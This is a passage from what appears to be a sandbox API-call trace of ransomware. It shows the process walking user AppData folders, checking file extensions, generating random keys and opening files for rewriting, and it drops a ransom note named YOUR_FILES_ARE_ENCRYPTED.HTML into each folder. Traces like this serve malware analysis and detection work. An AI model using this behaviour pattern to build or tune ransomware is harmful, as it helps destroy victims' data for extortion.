Explorer\\Recovery") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery" [0159.308] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*" [0159.309] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab3b3ce0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab3b3ce0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab3b3ce0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c300d, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.309] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab3b3ce0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab3b3ce0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab3b3ce0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c300d, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.309] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab3b3ce0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaba19800, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaba19800, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c300d, dwReserved1=0x0, cFileName="Active", cAlternateFileName="")) returned 1 [0159.309] wnsprintfW (in: pszDest=0x744a1c0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active") returned 81 [0159.309] GetProcessHeap () returned 0x270000 [0159.309] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x745a1c8 [0159.310] lstrcpyW (in: lpString1=0x745a1c8, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active" [0159.310] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*" [0159.310] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab3b3ce0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaba19800, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaba19800, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0159.310] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab3b3ce0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaba19800, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaba19800, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.310] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab3d9e40, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab3d9e40, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaba19800, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x60, cFileName="RecoveryStore.{E86C0042-5383-11EC-8920-000E3127764A}.dat", cAlternateFileName="RECOVE~1.DAT")) returned 1 [0159.310] wnsprintfW (in: pszDest=0x745a1c8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\RecoveryStore.{E86C0042-5383-11EC-8920-000E3127764A}.dat") returned 138 [0159.310] lstrcmpW (lpString1="RecoveryStore.{E86C0042-5383-11EC-8920-000E3127764A}.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.310] PathFindExtensionW (pszPath="RecoveryStore.{E86C0042-5383-11EC-8920-000E3127764A}.dat") returned=".dat" [0159.310] lstrlenW (lpString=".dat") returned 4 [0159.310] PathFindExtensionW (pszPath="RecoveryStore.{E86C0042-5383-11EC-8920-000E3127764A}.dat") returned=".dat" [0159.310] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0159.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\RecoveryStore.{E86C0042-5383-11EC-8920-000E3127764A}.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\internet explorer\\recovery\\active\\recoverystore.{e86c0042-5383-11ec-8920-000e3127764a}.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0159.311] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaba19800, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaba19800, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xabe43e80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x60, cFileName="{E86C0043-5383-11EC-8920-000E3127764A}.dat", cAlternateFileName="{E86C0~1.DAT")) returned 1 [0159.311] wnsprintfW (in: pszDest=0x745a1c8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\{E86C0043-5383-11EC-8920-000E3127764A}.dat") returned 124 [0159.311] lstrcmpW (lpString1="{E86C0043-5383-11EC-8920-000E3127764A}.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.311] PathFindExtensionW (pszPath="{E86C0043-5383-11EC-8920-000E3127764A}.dat") returned=".dat" [0159.311] lstrlenW (lpString=".dat") returned 4 [0159.311] PathFindExtensionW (pszPath="{E86C0043-5383-11EC-8920-000E3127764A}.dat") returned=".dat" [0159.311] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0159.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\{E86C0043-5383-11EC-8920-000E3127764A}.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\internet explorer\\recovery\\active\\{e86c0043-5383-11ec-8920-000e3127764a}.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0159.311] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaba19800, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaba19800, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xabe43e80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x60, cFileName="{E86C0043-5383-11EC-8920-000E3127764A}.dat", cAlternateFileName="{E86C0~1.DAT")) returned 0 [0159.311] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0159.311] wnsprintfW (in: pszDest=0x745a1c8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0159.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\internet explorer\\recovery\\active\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b4 [0159.317] WriteFile (in: hFile=0x5b4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0159.319] CloseHandle (hObject=0x5b4) returned 1 [0159.319] GetProcessHeap () returned 0x270000 [0159.321] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x745a1c8 | out: hHeap=0x270000) returned 1 [0159.321] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab3b3ce0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaba19800, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaba19800, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c300d, dwReserved1=0x0, cFileName="Active", cAlternateFileName="")) returned 0 [0159.321] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.321] wnsprintfW (in: pszDest=0x744a1c0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0159.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\internet explorer\\recovery\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0159.321] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.323] CloseHandle (hObject=0x5ac) returned 1 [0159.324] GetProcessHeap () returned 0x270000 [0159.325] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0159.325] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab3b3ce0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab3b3ce0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab3b3ce0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Recovery", cAlternateFileName="")) returned 0 [0159.325] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0159.325] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0159.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\internet explorer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0159.328] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0159.330] CloseHandle (hObject=0x4a8) returned 1 [0159.330] GetProcessHeap () returned 0x270000 [0159.331] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.336] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd4120340, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xd4120340, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0159.336] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player") returned 60 [0159.336] GetProcessHeap () returned 0x270000 [0159.336] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.338] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player" [0159.338] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\*" [0159.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd4120340, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xd4120340, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0159.340] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd4120340, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xd4120340, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.341] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x46b37180, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x105000, dwReserved0=0x0, dwReserved1=0x60, cFileName="CurrentDatabase_372.wmdb", cAlternateFileName="CURREN~1.WMD")) returned 1 [0159.341] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 85 [0159.341] lstrcmpW (lpString1="CurrentDatabase_372.wmdb", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.341] PathFindExtensionW (pszPath="CurrentDatabase_372.wmdb") returned=".wmdb" [0159.341] lstrlenW (lpString=".wmdb") returned 5 [0159.341] PathFindExtensionW (pszPath="CurrentDatabase_372.wmdb") returned=".wmdb" [0159.341] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x468fbce0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x468fbce0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x109a0, dwReserved0=0x0, dwReserved1=0x60, cFileName="LocalMLS_3.wmdb", cAlternateFileName="LOCALM~1.WMD")) returned 1 [0159.341] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 76 [0159.341] lstrcmpW (lpString1="LocalMLS_3.wmdb", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.341] PathFindExtensionW (pszPath="LocalMLS_3.wmdb") returned=".wmdb" [0159.341] lstrlenW (lpString=".wmdb") returned 5 [0159.341] PathFindExtensionW (pszPath="LocalMLS_3.wmdb") returned=".wmdb" [0159.341] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 1 [0159.341] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists") returned 75 [0159.342] GetProcessHeap () returned 0x270000 [0159.342] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x744a1c0 [0159.344] lstrcpyW (in: lpString1=0x744a1c0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists" [0159.344] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*" [0159.344] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.344] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.345] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0159.345] wnsprintfW (in: pszDest=0x744a1c0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned 81 [0159.345] GetProcessHeap () returned 0x270000 [0159.345] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x745a1c8 [0159.345] lstrcpyW (in: lpString1=0x745a1c8, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0159.345] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*" [0159.345] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0159.346] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.346] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="000080A3", cAlternateFileName="")) returned 1 [0159.346] wnsprintfW (in: pszDest=0x745a1c8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3") returned 90 [0159.346] GetProcessHeap () returned 0x270000 [0159.346] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x746a1d0 [0159.347] lstrcpyW (in: lpString1=0x746a1d0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3" [0159.347] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3", lpString2="\\*" | out: 